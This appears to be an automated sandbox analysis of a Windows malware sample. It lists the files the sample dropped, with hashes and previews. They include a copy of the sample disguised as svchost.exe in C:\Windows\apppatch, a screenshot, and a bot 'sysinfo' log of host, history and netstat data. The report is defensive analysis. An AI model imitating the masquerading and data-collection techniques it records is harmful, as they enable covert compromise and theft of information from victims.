                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.569948971951502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsoJg77aI944c/WpW8VYZYm8M4JuXLBFE+q8K/7e41Dud:uIjfuI7y4cu7VhJgwZeqDud
                                                                                                                                                                                                            MD5:7BB6A4F3EF4BB277B150320939DAF74C
                                                                                                                                                                                                            SHA1:01531EB506AAC7064FF7053DB630B91C8A89D504
                                                                                                                                                                                                            SHA-256:F100BF0CB06799530AEA7F238B85ACC18FDFD47E0456E435083E7620CA9CA947
                                                                                                                                                                                                            SHA-512:EFDC01B25BBE214667DA4D56E6D239D498CD5F0FC5D8A3C155BB72F5C9EEEC52C78F9DB3ADD6E44FFC9DDCF014CC29AE30038FDCFF6C0CA4088D61D9707B4F78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583691" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\login[2].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):43438
                                                                                                                                                                                                            Entropy (8bit):6.058290206467593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:CiBtrifZVO7Wg3hIBYFDWY7JXF5SN/QO4SN/QOV/SN/QOQSN/QOHSN/QOIsVBEH6:C8Cg3plFFAN/QOBN/QOVqN/QO5N/QOy1
                                                                                                                                                                                                            MD5:BFB2F05D95B02671C1794B0A84E91585
                                                                                                                                                                                                            SHA1:2A3CF01C12F247E160CAA1FC5CF7B18B3B4E55E3
                                                                                                                                                                                                            SHA-256:7C0AD49C697792818E234BA2F080FA6B6BF580BA24F54FE5D20CBADE24A15B5F
                                                                                                                                                                                                            SHA-512:2C45A52F01056561E47BDD6691FAEDEC1ED3CFBC745DA2BBDFAD4E80F17CE158E8B81F266F0EC4E0CE6DC371F0F0DCE61C17CE25FCE8968B70E3524ADB2693C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\login[1].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\login[2].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\login[4].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\login[5].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\login[4].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\1467841266.zip

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):54245
                                                                                                                                                                                                            Entropy (8bit):7.858573383156463
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sGT80eW05voD72t/7kXG+iOC+silDQ/NYUbW/:sGxeW05A7o/74COCAlvUbW/
                                                                                                                                                                                                            MD5:C82444CC66701016EAB1016D519DB00E
                                                                                                                                                                                                            SHA1:AE901B56E5E6D9CE7CBFBADE0A3E759DBC350922
                                                                                                                                                                                                            SHA-256:4A9F7A03DEA14E4687DFAA9C9A837A6FB455D7B1C3871C453093E2E17608049E
                                                                                                                                                                                                            SHA-512:31DA0D7FDE1AB157AD28D78AC31C0B215B4653A224445706654A913BFDD34910D330E289E021713751F4CB8D8588CD0EE77023F0E8DBCB3910622AD3B0AD7B53
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........3akY..R.9...........debug_17;Jan;2025_03;54;07.logUT...................0.......*q..H...Ee.m.ZUB..xX.5N..o.I..VT Z_%c.'...m2(M^.H..Ue}....9W.XW..2.t...K.lt.M.......G.w...m...'...P.......xe,...}..!q..lL...l....8v........ d....A..Yv.......6..<h...T...*?I.5v.0rC.Cd .KuXD.>!.<W..+.}.._p...z..f..6...4p11\..X.WU.U.Y....v.K...k...>y..i.....Z...$....f.n'..Z.t.w..c..j..X.L....~+.y..9.h.,%.8.6.N..){@.y8.L...9...(....5.ZUH..&...?...z..+..x.5.f...CC5/..H....2.....h.>s%$.p...]q..\e ...nE.......7..7..s+j......r..s............P".Z4z.S..x.cX'.@..x)..>.{a..7..../p..p....s..h..P.f.@.].N.l..`.....%..e.....{.K...O...7..Q:...l...PK........3akY........6.......scr.bmpUT................._..X...f.....w.^l.>.....}..7.kb.BR{.%A%..Y.u..{w6...X..sg..]=..F=.w..]...fz&..C.....f.8..6.......Tfd2!,..s....?.d.#....J.`...d*.S....O.......lnl.?...E.i...cC...............^.x.../6...>....]..].K.~.O.....ml.......K.wi..m...Vm|........|.............?....+.a.!m.H...vZ..S.....Oi....?...

                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\8a99a31f\debug_17;Jan;2025_03;54;07.log

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1806
                                                                                                                                                                                                            Entropy (8bit):5.36617555864784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:uXGiOiOyvBU0zc2i2LuiVGXZVV7RY6f6yZsosrOYXfVRXJsVRXDc3xwOeiYVbUlB:uhxvRdPSF9Xy/rJ+DAxwOVG0nX7nN
                                                                                                                                                                                                            MD5:FB7F04E56B29C85B076AB8AB6D5BA6F2
                                                                                                                                                                                                            SHA1:F15E20C8FECE36B141125CE2E9B0B84F0B51D636
                                                                                                                                                                                                            SHA-256:0C6952D17D4DA62A80A012102B71588FE3138628293F9FEAF13109DA08CFEC00
                                                                                                                                                                                                            SHA-512:A708992D51BF3E48BCD6A16B4175A4D228433AC5496E2CEDF6B002BB8AB5278170DA1C231EB74B31D425F3331AE8C9DA5D44804BFE8D7824F308D1619EDE4A70
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:ExceptionAddress = C:\Windows\System32\KERNELBASE.dll!RaiseException + 0x0062..ExceptionCode = 0x0000071A.Last error: 0x00000000..Context:.Eip = 0x7566CC12 Eax = 0x06F7F8E8 Ebx = 0x00000000.Ecx = 0x00000000 Edx = 0x00253000 Ebp = 0x06F7F940.Esp = 0x06F7F8E8 Esi = 0x0000071A Edi = 0x08A38150.EFlags = 0x00000246..Main module:.main 0x02640000-0x00063000..ThreadStart = unknown!0x02656970..CallStack:.C:\Windows\System32\RPCRT4.dll!RpcRaiseException + 0x003e.C:\Windows\System32\RPCRT4.dll!RpcErrorGetNextRecord + 0x0461.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x04ea.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x0553.C:\Windows\System32\RPCRT4.dll!RpcAsyncCompleteCall + 0x002c.C:\Windows\SYSTEM32\WINSTA.dll!WinStationRegisterConsoleNotification + 0x0422.C:\Windows\SYSTEM32\WINSTA.dll!WinStationQueryCurrentSessionInformation + 0x007a.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0ba5.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0b3d.C:\Windows\System32\R

                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\8a99a31f\scr.bmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 8, image size 1310720, cbSize 1311798, bits offset 1078
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1311798
                                                                                                                                                                                                            Entropy (8bit):2.9635836126535775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:N6IjwK5EqLSdgqDBgAhSkPXPCXJIY4GMO2S/AgPh3aFZ0yOiG5C5w8PA4ynd53Ur:N6IjwK5EqLSdgqDBgAhSkPXPCXJIY4Ga
                                                                                                                                                                                                            MD5:8E00CE6E581F0520E277B596BB317378
                                                                                                                                                                                                            SHA1:AD1EE4AE124995406C1A7B9FF99958A22777F768
                                                                                                                                                                                                            SHA-256:68D6BE02FADFBD4E3DBE7E042B9DD64136F913F1E1FAC90A87303187DEDEDC4D
                                                                                                                                                                                                            SHA-512:48C38A1DA738816E93414E4DB286E68D9237DEE8A0EA0874E29356A22203CBED867D4CF2E73E75E4A33D10806E8412D5D362C1D7E2513109A6D61A3B24418B03
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:BM6.......6...(............................................................................... @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`....................... ...@...`....................... ...@...`................@...@. .@.@.@.`.@...@...@...@...@ ..@ .@ @.@ `.@ ..@ ..@ ..@ ..@@..@@ .@@@.@@`.@@..@@..@@..@@..@`..@` .@`@.@``.@`..@`..@`..@`..@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@..@...@......... ...@...`.................. ... .. @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`....................... ...@...`....................... ...@...`...................... ...@...`.................. ... .. @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`...

                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\8a99a31f\sysinfo.log

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6269
                                                                                                                                                                                                            Entropy (8bit):5.208519565706757
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:rUyRgAkZxhk23W9ainvPXLJOIvsmOFOY2iBdvO1je37Oudvm273iViqXwoNuPZlc:rjqDGfqyg2tJyNQHf/CEL/
                                                                                                                                                                                                            MD5:16063E3B32EAC077EA40ACD8A6138091
                                                                                                                                                                                                            SHA1:3C41CA345CCA04332F6D12AE373ABB8D9E37BF8E
                                                                                                                                                                                                            SHA-256:E087BA3806E3F4893196D84A9630BBA0DA7F3C874285F3E41AAE6580D04EAC04
                                                                                                                                                                                                            SHA-512:8BD7964F0E6A04E3A230DAB550ED60369C9BE8F40596D168A027E7069FE01D59406D64D55209032F089A1326EE6386E0F6DAC783D000B006260213A50D355EDC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{BotVer: 4.1.2}.{Process: C:\Windows\apppatch\svchost.exe}.{Username: user}.{Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}.{Language: ENG}.{Screen: 1280x1024@32}.{Date: 17:Jan:2025}.{Local time: 03:54:07}.{GMT: -5:00}.{Uptime: 16d 23h 28m}.{Windows directory: C:\Windows}.{Administrator: true}.IE history:.{http://go.microsoft.com/fwlink/p/?LinkId=255141}.netstat.{Proto.Local address.Remote address.State.TCP.0.0.0.0:135.0.0.0.0:0.LISTEN.TCP.0.0.0.0:445.0.0.0.0:0.LISTEN.TCP.0.0.0.0:5040.0.0.0.0:0.LISTEN.TCP.0.0.0.0:22601.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49664.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49665.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49666.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49667.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49668.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49669.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49670.0.0.0.0:0.LISTEN.TCP.0.0.0.0:64111.0.0.0.0:0.LISTEN.TCP.192.168.2.9:139.0.0.0.0:0.LISTEN.TCP.192.168.2.9:49268.1.1.1.1:53.TIME_WAIT.TCP.192.168.2.9:49552.1.1.1.1:53.TIME_WAIT.TCP.192.168.2.9:49703.192.168.2.1:445.

                                                                                                                                                                                                            C:\Windows\apppatch\svchost.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\uavINoSIQh.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):211463
                                                                                                                                                                                                            Entropy (8bit):7.809238592616903
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:C+EqFQ9A9ty5bhJcrs0MurPw/c4hd/B/coyXT3nOGX6T+:C+U9qyFhJy56d/eoyXjn9W+
                                                                                                                                                                                                            MD5:ACF1B66F47538D1828695BAE8D83EF23
                                                                                                                                                                                                            SHA1:E1F87EA8BA51F1C1EC2F70EC416FC0772FDD1E28
                                                                                                                                                                                                            SHA-256:D0BD2130E7D3B4A2AD87EB399992C93B177CB3959B2779C15CE7F770798145FD
                                                                                                                                                                                                            SHA-512:6D20F2BDD465AB0596C3B02120994CBA69E2130CE38241868DCA6710DB323FE58AFB3E01AC90ADE36041B4EAA1C7166AA04D1CEAC1564B591CCE01DFD5F8B64D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.t>.................0.......7................@..........................P.......c%.....................................a..........H....................@......................................................................................text..../.......0.................. ..`.dHGmL..=s...@.......4..............@..@.lzmjSu..............:..............@....YOSWO...O...........<..............@..@.sTDEgl.Ct...........B..............@..@.fwQO...zy...`.......J..............@..@.L...................X..............@....D.......@...........Z..............@....data....&.......(...`..............@....kubC...ma..........................@....hkw....Y....p......................@....rsrc...H...........................@..@.reloc.......@.......4..............@..B........................................................................................................

                                                                                                                                                                                                            C:\Windows\apppatch\svchost.exe:Zone.Identifier

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\uavINoSIQh.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.8092453408916285
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:uavINoSIQh.exe
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5:98422c3dece103de16c166c7fbea2f6c
                                                                                                                                                                                                            SHA1:6cfcadc2ed5bb29ee8a1ff27c5b04c2481ee1e77
                                                                                                                                                                                                            SHA256:8eb3e521e20b9c7bbc6e71980c64d4a76e3db810ac2bbefec0d7780116101e70
                                                                                                                                                                                                            SHA512:d0b558128273401484f93ca8114641c4b4c3392b81f303531fa3fc38d313a481b8ca960aa82e62df622be617055829b02f1e7f0c3e412782bd65586ebccdf85e
